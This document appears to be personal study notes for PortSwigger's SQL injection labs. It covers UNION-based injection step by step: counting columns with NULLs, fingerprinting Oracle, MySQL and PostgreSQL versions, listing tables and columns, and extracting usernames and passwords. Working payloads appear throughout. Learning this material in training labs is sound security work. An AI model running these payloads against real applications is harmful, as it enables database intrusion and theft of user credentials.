Port Swigger SQL
returns all the items from the products table
SELECT * FROM products WHERE category = 'Gifts' OR 1=1--' AND released = 1
Union Select
query example:
How many NULL's do you need to break it?
If it breaks, that means you need to remove the last NULL.
Step2
Try inserting random text like 'a' in replace of NULL and see when it outputs the typed text
Step3, Now that we found where the string data resides, we can try to extract valid data.
Use Burp Suite to intercept and modify the request that sets the product category filter.
Determine the number of columns that are being returned by the query and which columns contain text data. Verify that the query is returning two columns, only one of which contain text, using a payload like the following in the
category
parameter:'+UNION+SELECT+NULL,'abc'--
Use the following payload to retrieve the contents of the
users
table:'+UNION+SELECT+NULL,username||'~'||password+FROM+users--
Verify that the application's response contains usernames and passwords.
Examining the database in SQL
Database type | Query |
---|---|
Microsoft, MySQL |
|
Oracle | SELECT banner FROM v$version |
PostgreSQL |
|
For example, you could use a UNION
attack with the following input:
' UNION SELECT @@version--
On Oracle databases, every SELECT
statement must specify a table to select FROM
. If your UNION SELECT
attack does not query from a table, you will still need to include the FROM
keyword followed by a valid table name.
There is a built-in table on Oracle called dual
which you can use for this purpose. For example: UNION SELECT 'abc' FROM dual
use the cheat sheet.
find how many nulls it can take
find which ones can handle text
put banner in one of the text enabled field and change dual to v$version
MySQL and Mycrosoft Version
Open burp and start intercepting traffic.
Determine how many NULLs - 2
2. Determine which column can take string pattern 'a','b'#
Both can take it!
3. Use the cheat sheat to contruct the payload for version
Examining the database in SQL injection attacks
When exploiting SQL injection vulnerabilities, it is often necessary to gather some information about the database itself. This includes the type and version of the database software, and the contents of the database in terms of which tables and columns it contains.
Listing the contents of the database
Most database types (with the notable exception of Oracle) have a set of views called the information schema which provide information about the database.
You can query information_schema.tables
to list the tables in the database:
SELECT * FROM information_schema.tables
This returns output like the following:
TABLE_CATALOG TABLE_SCHEMA TABLE_NAME TABLE_TYPE ===================================================== MyDatabase dbo Products BASE TABLE MyDatabase dbo Users BASE TABLE MyDatabase dbo Feedback BASE TABLE
This output indicates that there are three tables, called Products
, Users
, and Feedback
.
You can then query information_schema.columns
to list the columns in individual tables:
SELECT * FROM information_schema.columns WHERE table_name = 'Users'
Practice:
Databse = Oracle (takes -- as comment)
Determine the version PostgreSQL 11.15 (Debian 11.15-1.pgdg90+1) on x86_64-pc-linux-gnu, compiled by gcc (Debian 6.3.0-18+deb9u1) 6.3.0 20170516, 64-bit
payload 'UNION SELECT version(), NULL--
NULLs - can take 2 and both takes strings.
PostgeSQL uses information_schema for database
What table names does it use?
google "information_schema PostgreSQL"
'UNION SELECT table_name, NULL FROM information_schema.tables--
to determine table names.
Username table found
5. Column names can be found with column_name
Finally, extract username and password with
'UNION SELECT username_fqsrrh, password_gnbogm FROM users_pdklkk--
Equivalent to information schema on Oracle
On Oracle, you can obtain the same information with slightly different queries.
You can list tables by querying all_tables
:
SELECT * FROM all_tables
And you can list columns by querying all_tab_columns
:
SELECT * FROM all_tab_columns WHERE table_name = 'USERS'
'UNION SELECT NULL,NULL FROM dual-- (two outputs)
2. show table names.
USER$
USERS_EWFXQA
3. retrieve column names
4. retrieve username and password
Last updated